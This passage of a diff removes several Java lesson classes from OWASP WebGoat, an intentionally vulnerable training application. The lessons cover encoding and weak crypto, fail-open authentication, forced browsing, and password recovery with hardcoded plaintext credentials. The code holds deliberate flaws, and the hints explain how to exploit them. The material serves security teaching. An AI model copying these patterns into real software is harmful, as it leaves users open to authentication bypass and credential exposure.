-        byte[] b = decoder.decodeBuffer(str);
-
-        return (new String(b));
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param c
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     * @exception IOException
-     *                Description of the Exception
-     */
-
-    public static String base64Decode(char[] c) throws IOException
-    {
-
-        return base64Decode(new String(c));
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param c
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static String base64Encode(char[] c)
-    {
-
-        return base64Encode(new String(c));
-    }
-
-    /**
-     * Returns the base 64 encoding of a string.
-     * 
-     * @param str
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static String base64Encode(String str)
-    {
-
-        byte[] b = str.getBytes();
-
-        return (encoder.encode(b));
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param b
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static String base64Encode(byte[] b)
-    {
-
-        return (encoder.encode(b));
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    protected Element createContent(WebSession s)
-    {
-
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-
-            String userInput = s.getParser().getRawParameter(INPUT, "");
-
-            String userKey = s.getParser().getStringParameter(KEY, "");
-
-            Table table = new Table();
-
-            TR tr = new TR();
-
-            tr.addElement(new TD("Enter a string: "));
-
-            Input input = new Input(Input.TEXT, INPUT, userInput);
-
-            tr.addElement(new TD().addElement(input));
-
-            table.addElement(tr);
-
-            tr = new TR();
-
-            tr.addElement(new TD("Enter a password (optional): "));
-
-            Input key = new Input(Input.TEXT, KEY, userKey);
-
-            tr.addElement(new TD().addElement(key));
-
-            table.addElement(tr);
-
-            tr = new TR();
-
-            Element b = ECSFactory.makeButton("Go!");
-
-            tr.addElement(new TD().setAlign("center").setColSpan(2).addElement(b));
-
-            table.addElement(tr);
-
-            ec.addElement(table);
-
-            ec.addElement(new P());
-
-            Table t = new Table();
-
-            t.setWidth("100%");
-
-            t.setBorder(0);
-
-            t.setCellSpacing(1);
-
-            t.setCellPadding(4);
-
-            String description;
-
-            t.addElement(makeTitleRow("Description", "Encoded", "Decoded"));
-
-            description = "Base64 encoding is a simple reversable encoding used to encode bytes into ASCII characters. Useful for making bytes into a printable string, but provides no security.";
-
-            // t.addElement( makeDescriptionRow( description ) );
-            t.addElement(makeRow(description, base64Encode(userInput), base64Decode(userInput)));
-            // t.addElement( makeSpacerRow() );
-
-            description = "Entity encoding uses special sequences like &amp;amp; for special characters. This prevents these characters from being interpreted by most interpreters.";
-
-            t.addElement(makeRow(description, HtmlEncoder.encode(userInput), HtmlEncoder.decode(userInput)));
-
-            description = "Password based encryption (PBE) is strong encryption with a text password. Cannot be decrypted without the password";
-
-            t.addElement(makeRow(description, encryptString(userInput, userKey), decryptString(userInput, userKey)));
-            description = "MD5 hash is a checksum that can be used to validate a string or byte array, but cannot be reversed to find the original string or bytes. For obscure cryptographic reasons, it is better to use SHA-256 if you have a choice.";
-
-            t.addElement(makeRow(description, hashMD5(userInput), "Cannot reverse a hash"));
-
-            description = "SHA-256 hash is a checksum that can be used to validate a string or byte array, but cannot be reversed to find the original string or bytes.";
-
-            t.addElement(makeRow(description, hashSHA(userInput), "N/A"));
-
-            description = "Unicode encoding is...";
-
-            t.addElement(makeRow(description, "Not Implemented", "Not Implemented"));
-
-            description = "URL encoding is...";
-
-            t.addElement(makeRow(description, urlEncode(userInput), urlDecode(userInput)));
-
-            description = "Hex encoding simply encodes bytes into %xx format.";
-
-            t.addElement(makeRow(description, hexEncode(userInput), hexDecode(userInput)));
-
-            description = "Rot13 encoding is a way to make text unreadable, but is easily reversed and provides no security.";
-
-            t.addElement(makeRow(description, rot13(userInput), rot13(userInput)));
-
-            description = "XOR with password encoding is a weak encryption scheme that mixes a password into data.";
-
-            t.addElement(makeRow(description, xorEncode(userInput, userKey), xorDecode(userInput, userKey)));
-
-            description = "Double unicode encoding is...";
-
-            t.addElement(makeRow(description, "Not Implemented", "Not Implemented"));
-
-            description = "Double URL encoding is...";
-
-            t.addElement(makeRow(description, urlEncode(urlEncode(userInput)), urlDecode(urlDecode(userInput))));
-
-            ec.addElement(t);
-
-        }
-
-        catch (Exception e)
-        {
-
-            s.setMessage("Error generating " + this.getClass().getName());
-
-            e.printStackTrace();
-
-        }
-
-        if (getLessonTracker(s).getNumVisits() > 3)
-        {
-            makeSuccess(s);
-        }
-
-        return (ec);
-    }
-
-    /**
-     * Convenience method for encrypting a string.
-     * 
-     * @param str
-     *            Description of the Parameter
-     * @param pw
-     *            Description of the Parameter
-     * @return String the encrypted string.
-     */
-
-    public static synchronized String decryptString(String str, String pw)
-    {
-
-        try
-        {
-
-            PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec(salt, 20);
-
-            SecretKeyFactory kf = SecretKeyFactory.getInstance("PBEWithMD5AndDES");
-
-            Cipher passwordDecryptCipher = Cipher.getInstance("PBEWithMD5AndDES/CBC/PKCS5Padding");
-
-            char[] pass = pw.toCharArray();
-
-            SecretKey k = kf.generateSecret(new javax.crypto.spec.PBEKeySpec(pass));
-
-            passwordDecryptCipher.init(Cipher.DECRYPT_MODE, k, ps);
-
-            byte[] dec = decoder.decodeBuffer(str);
-
-            byte[] utf8 = passwordDecryptCipher.doFinal(dec);
-
-            return new String(utf8, "UTF-8");
-        }
-
-        catch (Exception e)
-        {
-
-            return ("This is not an encrypted string");
-        }
-
-    }
-
-    /**
-     * Convenience method for encrypting a string.
-     * 
-     * @param str
-     *            Description of the Parameter
-     * @param pw
-     *            Description of the Parameter
-     * @return String the encrypted string.
-     * @exception SecurityException
-     *                Description of the Exception
-     */
-
-    public static synchronized String encryptString(String str, String pw) throws SecurityException
-    {
-
-        try
-        {
-
-            PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec(salt, 20);
-
-            SecretKeyFactory kf = SecretKeyFactory.getInstance("PBEWithMD5AndDES");
-
-            Cipher passwordEncryptCipher = Cipher.getInstance("PBEWithMD5AndDES/CBC/PKCS5Padding");
-
-            char[] pass = pw.toCharArray();
-
-            SecretKey k = kf.generateSecret(new javax.crypto.spec.PBEKeySpec(pass));
-
-            passwordEncryptCipher.init(Cipher.ENCRYPT_MODE, k, ps);
-
-            byte[] utf8 = str.getBytes("UTF-8");
-
-            byte[] enc = passwordEncryptCipher.doFinal(utf8);
-
-            return encoder.encode(enc);
-        }
-
-        catch (Exception e)
-        {
-
-            return ("Encryption error");
-        }
-
-    }
-
-    /**
-     * Gets the category attribute of the Encoding object
-     * 
-     * @return The category value
-     */
-
-    protected Category getDefaultCategory()
-    {
-        return Category.INSECURE_STORAGE;
-    }
-
-    /**
-     * Gets the hints attribute of the HelloScreen object
-     * 
-     * @return The hints value
-     */
-
-    public List<String> getHints(WebSession s)
-    {
-
-        List<String> hints = new ArrayList<String>();
-        hints.add("Enter a string and press 'go'");
-        hints.add("Enter 'abc' and notice the rot13 encoding is 'nop' ( increase each letter by 13 characters ).");
-        hints.add("Enter 'a c' and notice the url encoding is 'a+c' ( ' ' is converted to '+' ).");
-        return hints;
-    }
-
-    /**
-     * Gets the instructions attribute of the Encoding object
-     * 
-     * @return The instructions value
-     */
-
-    public String getInstructions(WebSession s)
-    {
-        return "This lesson will familiarize the user with different encoding schemes.  ";
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(15);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the HelloScreen object
-     * 
-     * @return The title value
-     */
-
-    public String getTitle()
-    {
-        return ("Encoding Basics");
-    }
-
-    /**
-     * Returns the MD5 hash of a String.
-     * 
-     * @param str
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static String hashMD5(String str)
-    {
-
-        byte[] b = str.getBytes();
-        MessageDigest md = null;
-
-        try
-        {
-            md = MessageDigest.getInstance("MD5");
-            md.update(b);
-        } catch (NoSuchAlgorithmException e)
-        {
-            // it's got to be there
-            e.printStackTrace();
-        }
-        return (base64Encode(md.digest()));
-    }
-
-    /**
-     * Returns the SHA hash of a String.
-     * 
-     * @param str
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static String hashSHA(String str)
-    {
-        byte[] b = str.getBytes();
-        MessageDigest md = null;
-        try
-        {
-            md = MessageDigest.getInstance("SHA-256");
-            md.update(b);
-        } catch (NoSuchAlgorithmException e)
-        {
-            // it's got to be there
-            e.printStackTrace();
-        }
-        return (base64Encode(md.digest()));
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param hexString
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static String hexDecode(String hexString)
-    {
-        try
-        {
-            if ((hexString.length() % 3) != 0) { return ("String not comprised of Hex digit pairs."); }
-            char[] chars = new char[hexString.length()];
-            char[] convChars = new char[hexString.length() / 3];
-            hexString.getChars(0, hexString.length(), chars, 0);
-            for (int i = 1; i < hexString.length(); i += 3)
-            {
-                String hexToken = new String(chars, i, 2);
-                convChars[i / 3] = (char) Integer.parseInt(hexToken, 16);
-            }
-            return new String(convChars);
-        } catch (NumberFormatException nfe)
-        {
-            return ("String not comprised of Hex digits");
-        }
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param asciiString
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static String hexEncode(String asciiString)
-    {
-        char[] ascii = new char[asciiString.length()];
-        asciiString.getChars(0, asciiString.length(), ascii, 0);
-        StringBuffer hexBuff = new StringBuffer();
-        for (int i = 0; i < asciiString.length(); i++)
-        {
-            hexBuff.append("%");
-            hexBuff.append(Integer.toHexString(ascii[i]));
-        }
-        return hexBuff.toString().toUpperCase();
-    }
-
-    /**
-     * The main program for the Encoding class
-     * 
-     * @param args
-     *            The command line arguments
-     */
-
-    public static void main(String[] args)
-    {
-        try
-        {
-            String userInput = args[0];
-            String userKey = args[1];
-            System.out.println("Working with: " + userInput);
-            System.out.print("Base64 encoding: ");
-            System.out.println(base64Encode(userInput) + " : " + base64Decode(userInput));
-            System.out.print("Entity encoding: ");
-            System.out.println(HtmlEncoder.encode(userInput) + " : " + HtmlEncoder.decode(userInput));
-            System.out.print("Password based encryption (PBE): ");
-            System.out.println(encryptString(userInput, userKey) + " : " + decryptString(userInput, userKey));
-            System.out.print("MD5 hash: ");
-            System.out.println(hashMD5(userInput) + " : " + "Cannot reverse a hash");
-            System.out.print("SHA-256 hash: ");
-            System.out.println(hashSHA(userInput) + " : " + "Cannot reverse a hash");
-            System.out.print("Unicode encoding: ");
-            System.out.println("Not Implemented" + " : " + "Not Implemented");
-            System.out.print("URL encoding: ");
-            System.out.println(urlEncode(userInput) + " : " + urlDecode(userInput));
-            System.out.print("Hex encoding: ");
-            System.out.println(hexEncode(userInput) + " : " + hexDecode(userInput));
-            System.out.print("Rot13 encoding: ");
-            System.out.println(rot13(userInput) + " : " + rot13(userInput));
-            System.out.print("XOR with password: ");
-            System.out.println(xorEncode(userInput, userKey) + " : " + xorDecode(userInput, userKey));
-            System.out.print("Double unicode encoding is...");
-            System.out.println("Not Implemented" + " : " + "Not Implemented");
-            System.out.print("Double URL encoding: ");
-            System.out.println(urlEncode(urlEncode(userInput)) + " : " + urlDecode(urlDecode(userInput)));
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        }
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param value1
-     *            Description of the Parameter
-     * @param value2
-     *            Description of the Parameter
-     * @param description
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    private TR makeRow(String description, String value1, String value2)
-    {
-
-        TD desc = new TD().addElement(description).setBgColor("#bbbbbb");
-        TD val1 = new TD()
-                .addElement(new Div().addElement(value1).setStyle("overflow:auto; height:60px; width:100px;"))
-                .setBgColor("#dddddd");
-        TD val2 = new TD()
-                .addElement(new Div().addElement(value2).setStyle("overflow:auto; height:60px; width:100px;"))
-                .setBgColor("#dddddd");
-        TR tr = new TR();
-
-        tr.addElement(desc);
-        tr.addElement(val1);
-        tr.addElement(val2);
-
-        return tr;
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param value1
-     *            Description of the Parameter
-     * @param value2
-     *            Description of the Parameter
-     * @param description
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    private TR makeTitleRow(String description, String value1, String value2)
-    {
-        TD desc = new TD().addElement(new B().addElement(description));
-        TD val1 = new TD().addElement(new B().addElement(value1));
-        TD val2 = new TD().addElement(new B().addElement(value2));
-        desc.setAlign("center");
-        val1.setAlign("center");
-        val2.setAlign("center");
-        TR tr = new TR();
-        tr.addElement(desc);
-        tr.addElement(val1);
-        tr.addElement(val2);
-        return (tr);
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param input
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static synchronized String rot13(String input)
-    {
-        StringBuffer output = new StringBuffer();
-        if (input != null)
-        {
-            for (int i = 0; i < input.length(); i++)
-            {
-                char inChar = input.charAt(i);
-                if ((inChar >= 'A') & (inChar <= 'Z'))
-                {
-                    inChar += 13;
-                    if (inChar > 'Z')
-                    {
-                        inChar -= 26;
-                    }
-                }
-                if ((inChar >= 'a') & (inChar <= 'z'))
-                {
-                    inChar += 13;
-                    if (inChar > 'z')
-                    {
-                        inChar -= 26;
-                    }
-                }
-                output.append(inChar);
-            }
-        }
-        return output.toString();
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param str
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static String unicodeDecode(String str)
-    {
-        // FIXME: TOTALLY EXPERIMENTAL
-
-        try
-        {
-            ByteBuffer bbuf = ByteBuffer.allocate(str.length());
-            bbuf.put(str.getBytes());
-            Charset charset = Charset.forName("ISO-8859-1");
-            CharsetDecoder decoder = charset.newDecoder();
-            CharBuffer cbuf = decoder.decode(bbuf);
-            return (cbuf.toString());
-        } catch (Exception e)
-        {
-            return ("Encoding problem");
-        }
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param str
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static String unicodeEncode(String str)
-    {
-        // FIXME: TOTALLY EXPERIMENTAL
-        try
-        {
-            Charset charset = Charset.forName("ISO-8859-1");
-            CharsetEncoder encoder = charset.newEncoder();
-            ByteBuffer bbuf = encoder.encode(CharBuffer.wrap(str));
-            return (new String(bbuf.array()));
-        } catch (Exception e)
-        {
-            return ("Encoding problem");
-        }
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param str
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static String urlDecode(String str)
-    {
-        try
-        {
-            return (URLDecoder.decode(str, "UTF-8"));
-        } catch (Exception e)
-        {
-            return ("Decoding error");
-        }
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param str
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static String urlEncode(String str)
-    {
-        try
-        {
-            return (URLEncoder.encode(str, "UTF-8"));
-        } catch (Exception e)
-        {
-            return ("Encoding error");
-        }
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param input
-     *            Description of the Parameter
-     * @param userKey
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static synchronized char[] xor(String input, String userKey)
-    {
-        if ((userKey == null) || (userKey.trim().length() == 0))
-        {
-            userKey = "Goober";
-        }
-        char[] xorChars = userKey.toCharArray();
-        int keyLen = xorChars.length;
-        char[] inputChars = null;
-        char[] outputChars = null;
-        if (input != null)
-        {
-            inputChars = input.toCharArray();
-            outputChars = new char[inputChars.length];
-            for (int i = 0; i < inputChars.length; i++)
-            {
-                outputChars[i] = (char) (inputChars[i] ^ xorChars[i % keyLen]);
-            }
-        }
-        return outputChars;
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param input
-     *            Description of the Parameter
-     * @param userKey
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static synchronized String xorDecode(String input, String userKey)
-    {
-        try
-        {
-            String decoded = base64Decode(input);
-            return new String(xor(decoded, userKey));
-        } catch (Exception e)
-        {
-            return "String not XOR encoded.";
-        }
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param input
-     *            Description of the Parameter
-     * @param userKey
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    public static synchronized String xorEncode(String input, String userKey)
-    {
-        return base64Encode(xor(input, userKey));
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/FailOpenAuthentication.java

@@ -1,185 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.IMG;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created October 28, 2003
- */
-public class FailOpenAuthentication extends WeakAuthenticationCookie
-{
-
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        boolean logout = s.getParser().getBooleanParameter(LOGOUT, false);
-
-        if (logout)
-        {
-            s.setMessage("Goodbye!");
-            s.eatCookies();
-
-            return (makeLogin(s));
-        }
-
-        try
-        {
-            String username = "";
-            String password = "";
-
-            try
-            {
-                username = s.getParser().getRawParameter(USERNAME);
-                password = s.getParser().getRawParameter(PASSWORD);
-
-                // if credentials are bad, send the login page
-                if (!"webgoat".equals(username) || !password.equals("webgoat"))
-                {
-                    s.setMessage("Invalid username and password entered.");
-
-                    return (makeLogin(s));
-                }
-            } catch (Exception e)
-            {
-                // The parameter was omitted. set fail open status complete
-                if (username.length() > 0 && e.getMessage().indexOf("not found") != -1)
-                {
-                    if ((username != null) && (username.length() > 0))
-                    {
-                        makeSuccess(s);
-                        return (makeUser(s, username, "Fail Open Error Handling"));
-                    }
-                }
-            }
-
-            // Don't let the fail open pass with a blank password.
-            if (password.length() == 0)
-            {
-                // We make sure the username was submitted to avoid telling the user an invalid
-                // username/password was entered when they first enter the lesson via the side menu.
-                // This also suppresses the error if they just hit the login and both fields are
-                // empty.
-                if (username.length() != 0)
-                {
-                    s.setMessage("Invalid username and password entered.");
-                }
-
-                return (makeLogin(s));
-
-            }
-
-            // otherwise authentication is good, show the content
-            if ((username != null) && (username.length() > 0)) { return (makeUser(s, username,
-                                                                                    "Parameters.  You did not exploit the fail open.")); }
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-        }
-
-        return (makeLogin(s));
-    }
-
-    /**
-     * Gets the category attribute of the FailOpenAuthentication object
-     * 
-     * @return The category value
-     */
-    public Category getDefaultCategory()
-    {
-        return Category.ERROR_HANDLING;
-    }
-
-    /**
-     * Gets the hints attribute of the AuthenticateScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("You can force errors during the authentication process.");
-        hints.add("You can change length, existance, or values of authentication parameters.");
-        hints
-                .add("Try removing a parameter ENTIRELY with <A href=\"http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project\">OWASP ZAP</A>.");
-
-        return hints;
-    }
-
-    /**
-     * Gets the instructions attribute of the FailOpenAuthentication object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-        return "Due to an error handling problem in the authentication mechanism, it is possible to authenticate "
-                + "as the 'webgoat' user without entering a password.  Try to login as the webgoat user without "
-                + "specifying a password.";
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(20);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the AuthenticateScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Fail Open Authentication Scheme");
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/ForcedBrowsing.java

@@ -1,150 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Sherif Koussa <a href="http://www.softwaresecured.com">Software Secured</a>
- * @created November 02, 2006
- */
-public class ForcedBrowsing extends LessonAdapter
-{
-
-    private final static String SUCCEEDED = "succeeded";
-
-    public final static A MAC_LOGO = new A().setHref("http://www.softwaresecured.com").addElement(new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured").setBorder(0).setHspace(0).setVspace(0));
-    
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        String success = new String(s.getParser().getStringParameter(SUCCEEDED, ""));
-
-        if (success.length() != 0 && success.equals("yes"))
-        {
-            ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Configuration Page")));
-            ec.addElement(new BR());
-            Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center");
-
-            TR tr = new TR();
-            tr.addElement(new TD(new StringElement("Set Admin Privileges for: ")));
-
-            Input input1 = new Input(Input.TEXT, "", "");
-            tr.addElement(new TD(input1));
-            t1.addElement(tr);
-
-            tr = new TR();
-            tr.addElement(new TD(new StringElement("Set Admin Password:")));
-
-            input1 = new Input(Input.PASSWORD, "", "");
-            tr.addElement(new TD(input1));
-            t1.addElement(tr);
-
-            Element b = ECSFactory.makeButton("Submit");
-            t1.addElement(new TR(new TD(b).setColSpan(2).setAlign("right")));
-            ec.addElement(t1);
-
-            makeSuccess(s);
-        }
-        else
-        {
-            ec
-                    .addElement("Can you try to force browse to the config page which should only be accessed by maintenance personnel.");
-        }
-        return ec;
-    }
-
-    /**
-     * Gets the category attribute of the ForgotPassword object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.INSECURE_CONFIGURATION;
-    }
-
-    /**
-     * Gets the hints attribute of the HelloScreen object
-     * 
-     * @return The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Try to guess the URL for the config page");
-        hints.add("The config page is guessable and hackable");
-        hints.add("Play with the URL and try to guess what you can replace 'attack' with.");
-        hints.add("Try to navigate to http://localhost/WebGoat/conf");
-        return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(15);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the HelloScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Forced Browsing");
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by Sherif Koussa&nbsp;", MAC_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/ForgotPassword.java

@@ -1,335 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import java.util.HashMap;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Eric Sheridan <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created December 18, 2005
- */
-public class ForgotPassword extends LessonAdapter
-{
-
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    private final static String USERNAME = "Username";
-
-    private static String USERNAME_RESPONSE = "";
-
-    private final static String COLOR = "Color";
-
-    private static String COLOR_RESPONSE = "";
-
-    private static int STAGE = 1;
-
-    private final static HashMap<String, String> USERS = new HashMap<String, String>();
-
-    private final static HashMap<String, String> COLORS = new HashMap<String, String>();
-
-    private void populateTables()
-    {
-        USERS.put("admin", "2275$starBo0rn3");
-        USERS.put("jeff", "(_I_)illia(V)s");
-        USERS.put("dave", "\\V/ich3r$");
-        USERS.put("intern", "H3yn0w");
-        USERS.put("webgoat", "webgoat");
-
-        COLORS.put("admin", "green");
-        COLORS.put("jeff", "orange");
-        COLORS.put("dave", "purple");
-        COLORS.put("intern", "yellow");
-        COLORS.put("webgoat", "red");
-    }
-
-    protected Element doStage1(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        ec.addElement(new BR().addElement(new H1().addElement("Webgoat Password Recovery ")));
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        TR tr = new TR();
-        tr.addElement(new TH()
-                .addElement("Please input your username.  See the OWASP admin if you do not have an account.")
-                .setColSpan(2).setAlign("left"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
-        t.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-        t.addElement(tr);
-
-        TR row1 = new TR();
-        row1.addElement(new TD(new B(new StringElement("*User Name: "))));
-
-        Input input1 = new Input(Input.TEXT, USERNAME, "");
-        row1.addElement(new TD(input1));
-        t.addElement(row1);
-
-        Element b = ECSFactory.makeButton("Submit");
-        t.addElement(new TR(new TD(b)));
-        ec.addElement(t);
-
-        return (ec);
-    }
-
-    protected Element doStage2(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        ec.addElement(new H1().addElement("Webgoat Password Recovery "));
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        TR tr = new TR();
